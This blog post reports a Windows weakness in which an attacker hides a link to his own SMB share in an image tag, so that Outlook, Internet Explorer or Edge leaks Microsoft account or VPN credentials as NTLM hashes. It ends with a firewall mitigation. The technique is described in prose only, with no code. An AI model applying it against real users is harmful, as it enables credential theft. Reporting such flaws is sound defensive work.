Skip to main content

Windows flaw


Microsoft Account Passwords, VPN Credentials Leaked Due To Windows Flaw

 
All Windows versions have a flaw that leak Microsoft account passwords and VPN credentials

If a Microsoft user is using a VPN (virtual private network) to browse the Internet, there are chances that the user’s Microsoft account username and password or VPN credentials could be leaked. The reason behind this is assumed to be the error by Windows in handling its old validation procedures for shared network resources.

The exploit depends on an attacker inserting a link to an SMB resource (network share) inside an email or a Web page that gets noticed via Outlook.

Inside the image tags, the attacker can camouflage the link to his network share. Further, they can put the link to a network share hosted on his own network instead of the proper image link.

When a user tries to use the link via Internet Explorer, Edge, or Outlook, their computer even via the Internet will automatically send their login credentials to validate on the criminal’s domain. The reason is due to the way Windows manages authentication for network shares.

Even though Microsoft account password is not leaked in cleartext, researchers demonstrated a long time ago that as an NTLM hash, these could be easily cracked.

This isn’t even something new, since Microsoft and the researcher community have known about this issue since 1997 and often discussed it at security conferences such as black hat.

This was not an issue in the past, as Windows accounts were using machine-localized usernames and password. However, Microsoft started to allow users to validate on their computers with Microsoft accounts after it introduced Windows 8 and upwards. By the time, Windows 10 was out; this became the de-facto standard validation method implying that it was used by more users.

Microsoft has begun to associate all its online realities with the user’s same Microsoft account in the recent years. This old attack now allows a crook to access credentials for Microsoft accounts, which in turn will also grant them indirect entry to all kinds of services like Skype, OneDrive, Xbox, Bing, MSN, Office 360, Azure, and more, says ValdikSS from Prosto VPN.

To make things worse, the user’s VPN credentials get leaked if the user is making use of a VPN connection to load the fraudulent SMB resource. This allows the crook to access the victim’s VPN account.

“Microsoft successfully fixed some issues, some other issues were half-fixed, and another ones are not fixed at all and could be exploited up to this day,” ValdikSS explains. “The problem of transmitting account credentials to the SMB server over the internet is one of the not fixed ones.”

One can simply protect themselves against such attacks is by obstructing all outgoing SMB connections (port 445) via the Windows firewall, except for local networks, ValdikSS says. However, the best solution against such attack would be to not use your Microsoft account to log into your Windows PC.

Comments

Popular posts from this blog

So what exactly is cryptography

Nowadays Internet is an important part of Life.  We are using the Internet for sending confidential data also like password,for storing army secrets. But the Internet is insecure medium.we all use internet at a daily basis.  Do you know why? Insecure Medium: Imagine you are sending a data.  In internet world, data are separated as packets and send to the destination.  Do you think the data directly reaching the destination?   If  you think so,you are wrong.  The packets are going through different routers.  Finally, the data is sent to the user.  In this gap, Intruders(i mean attackers) takes advantages. so who are they .the are  I.they  can see what you are sending.  Because your data are simple and easy to readable by anyone. How to secure the data? We can not stop the intruders and their activities.  But we can make our data as Unreadable for Intruders.  For this purpose, the Cryptography is introduce...

Lunix malware havoc

The Krebs DDoS attacks have proven that the IoT landscape is a fertile ground that can breed huge botnets capable of launching massive DDoS assaults. As such, it should be no surprise that malware authors are now focusing their efforts on this sector and putting out new threats in the hopes of building the next Mirai botnet. One of the latest additions to the IoT malware market is a trojan codenamed Linux/NyaDrop, recently reverse engineered by MalwareMustDie, the same researcher who discovered the Mirai malware. MalwareMustDie points out in his research that this binary appeared in May, but was somewhat simplistic and not that common. Things changed after the Krebs DDoS attacks, and a new sample has appeared on the market, with the malware’s author most likely drawn back to the IoT landscape by Mirai’s success. Just like most IoT malware nowadays, NyaDrop’s author relies on brute-forcing Internet-exposed IoT devices using their default credentials. In a conversati...

Which devices will get Android N upgrade the complete list

  As the Android 7.0 Nougat is here, people are searching the web to know when their phone will get Nougat update. To answer your question, we have prepared a list of the popular brands, telling you about their plans to roll out the Android 7.0 Nougat update. While brands like Moto, Nexus, HTC, and LG are preparing for any early OTA update, other are likely to do the same in January-February 2017. Every year we witness the release of a brand new version of Google’s Android operating system. While last year’s update was named Android 6.0 Marshmallow, this year we’ve got  Android 7.0 Nougat . Android Nougat is being termed as a major rollout, packing a heavy chunk of  new features and improvements . Coming loaded with new features like multitasking, VR, keyboard themes, and new emojis, Android 7.0 Nougat is arriving soon to Android devices. Keeping these great features aside, another important question is — “When will my phone get Android 7.0 Nougat update?” If we ta...